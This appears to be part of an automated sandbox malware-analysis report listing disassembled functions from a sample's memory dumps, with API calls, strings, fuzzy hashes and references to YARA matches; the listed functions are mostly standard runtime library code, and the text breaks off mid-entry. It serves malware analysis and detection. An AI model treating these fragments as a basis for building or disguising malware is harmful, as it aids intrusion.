Function 0064EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0064F228,00000004,00647D87,00000004,00648069), ref: 0064EEF9
GetLastError.KERNEL32(?,0064F228,00000004,00647D87,00000004,00648069,?,00648799,?,00000008,0064800D,00000000,?,?,00000000,?), ref: 0064EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0064F228,00000004,00647D87,00000004,00648069,?,00648799,?,00000008,0064800D,00000000,?,?,00000000), ref: 0064EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0064EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF9D

Strings

advapi32.dll, xrefs: 0064EEF3, 0064EEF8, 0064EF14

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: e0153d14bb7a4df63486330ac283cf2dd879628c7fda228a915bab3aaa563f74
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: BC218EB1904711BFD7106FB49C09A9ABFA8FF05B16F104A2AF555E3601CB7C94818BA8

Function 0064EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0064F228,00000004,00647D87,00000004,00648069), ref: 0064EEF9
GetLastError.KERNEL32(?,0064F228,00000004,00647D87,00000004,00648069,?,00648799,?,00000008,0064800D,00000000,?,?,00000000,?), ref: 0064EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0064F228,00000004,00647D87,00000004,00648069,?,00648799,?,00000008,0064800D,00000000,?,?,00000000), ref: 0064EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0064EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064EF9D

Strings

advapi32.dll, xrefs: 0064EEF3, 0064EEF8, 0064EF14

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 3c35d584e4dd35931092f3e59f35430901448041857ae76a44f1c40ba47706ef
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 86219DB1904711BFD7106FB49C09A9ABFECFF05B16F108A2AF555E3601CB7C94818BA8

Function 006424A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0064670B), ref: 006424B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 006424C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 006424D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0064670B), ref: 00642500
GetProcAddress.KERNEL32(00000000), ref: 00642507
GetLastError.KERNEL32(?,?,?,0064670B), ref: 00642522
GetLastError.KERNEL32(?,?,?,0064670B), ref: 0064252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00642544
__CxxThrowException@8.LIBVCRUNTIME ref: 00642552

Strings

kernel32.dll, xrefs: 006424B0, 006424B5, 006424FA

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: af494db23303ccf7c0254b29c81a2b3f9bf354359e8076bddad3063b405b5a5b
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: CD11E9755003127FE7147B746C6AAAB3BADDE05B13770052AF801E3252EF34D940866C

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

switchState, xrefs: 00424882
pContext, xrefs: 00424946

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 00650C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00650C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00650C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00650CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00650D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00650D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00650D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00650D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00650D80
__CxxThrowException@8.LIBVCRUNTIME ref: 00650DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00650DBC

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: d0909fe0e59a1b4305bcc84c06f0e6bc9b21961f996ed4b670131d46f4e986da
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: B041A030A042489AEF58FBA4C4567ED77A3AF02305F1441ADED065B383CB359A09C7A9

Function 0066204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00662061

Part of subcall function 006636D1: HeapFree.KERNEL32(00000000,00000000,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?), ref: 006636E7
Part of subcall function 006636D1: GetLastError.KERNEL32(?,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?,?), ref: 006636F9

_free.LIBCMT ref: 0066206D
_free.LIBCMT ref: 00662078
_free.LIBCMT ref: 00662083
_free.LIBCMT ref: 0066208E
_free.LIBCMT ref: 00662099
_free.LIBCMT ref: 006620A4
_free.LIBCMT ref: 006620AF
_free.LIBCMT ref: 006620BA
_free.LIBCMT ref: 006620C8

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 335427a9dedb4c24fbcd5b3ab64704065c4c8516a2d614f15814d0111ca0eee6
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 4B11447661011CBFCB81EF55C942DD93BA6EF04350B6541A9BA088F362DA71DF609B84

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E229, 0042E1C0
F(@, xrefs: 0042E25E, 0042E1CC, 0042E261

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

acos, xrefs: 0043F03D
asin, xrefs: 0043F031
log, xrefs: 0043EF6B, 0043EF77
sqrt, xrefs: 0043F049
exp, xrefs: 0043EF8A, 0043EFEC
pow, xrefs: 0043EFA9, 0043F055, 0043F068
log10, xrefs: 0043EF0F, 0043EF5F

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 00663190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: 0f72c06fc696f4983a0de7016725cda81b173482545a9ff6b24185c6a71ac26d
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: 22C11370E04399AFDF15DFA8C841BEEBBB6AF0A311F144199E814A7392C7309B41CB65

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
PMDtoOffset.LIBCMT ref: 00428D4F

Strings

Bad dynamic_cast!, xrefs: 00428D91

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

Function 0040556E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Strings

Peo, xrefs: 0040558D, 004055DD

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: Peo
API String ID: 2243866535-1450841225
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 0064C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0064C6DC
atomic_compare_exchange.LIBCONCRT ref: 0064C700
std::_Cnd_initX.LIBCPMT ref: 0064C711
std::_Cnd_initX.LIBCPMT ref: 0064C71F

Part of subcall function 00631370: __Mtx_unlock.LIBCPMT ref: 00631377

std::_Cnd_initX.LIBCPMT ref: 0064C72F

Part of subcall function 0064C3EF: __Cnd_broadcast.LIBCPMT ref: 0064C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0064C73D

Strings

t#D, xrefs: 0064C6C2

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: 2554876aeb7a3df263e5b011c1a9c79f834c8163a1660569944565235c74aa56
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: CB01F771901605ABDB91B760CD86B9DB75AAF00310F144019F9049B781DB74EA11CBDA

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 00661129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

_free.LIBCMT ref: 00661444
_free.LIBCMT ref: 0066145D
_free.LIBCMT ref: 0066148F
_free.LIBCMT ref: 00661498
_free.LIBCMT ref: 006614A4

Strings

C, xrefs: 00661291

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 16db9960c12b09143c77dc4ab1f775c7bc4de828be9a39bb9a52a40b608c17e5
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 4BB14A75A01219DFDB64DF18C884AADB7B5FF09304F1485AEE909AB350D730AE90CF44

Function 0066A115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0066A184
_free.LIBCMT ref: 0066A192
_free.LIBCMT ref: 0066A2C0
_free.LIBCMT ref: 0066A2CB

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: da7599372553cafc52791983c27e6214e2da34d458ce41558a6f6c589d7ffe0b
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: C361E271940205AFDB60CFA8C842B9ABBFAEF45710F2441AAE944FB342E7719E418F55

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 00663AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0065C4A4,E0830C40,?,?,?,?,?,?,0066425F,0063E03C,0065C4A4,?,0065C4A4,0065C4A4,0063E03C), ref: 00663B2C
__fassign.LIBCMT ref: 00663BA7
__fassign.LIBCMT ref: 00663BC2
WideCharToMultiByte.KERNEL32(?,00000000,0065C4A4,00000001,?,00000005,00000000,00000000), ref: 00663BE8
WriteFile.KERNEL32(?,?,00000000,0066425F,00000000,?,?,?,?,?,?,?,?,?,0066425F,0063E03C), ref: 00663C07
WriteFile.KERNEL32(?,0063E03C,00000001,0066425F,00000000,?,?,?,?,?,?,?,?,?,0066425F,0063E03C), ref: 00663C40

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: 12d2606861e89b71458f46f4415a08fd766b6c7a4f4bb6fcc51a1828aa193e2c
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: DA51A274A00219AFCB10CFA8D885AEEBBF5EF49701F14416EE556F7391E7309A41CB64

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

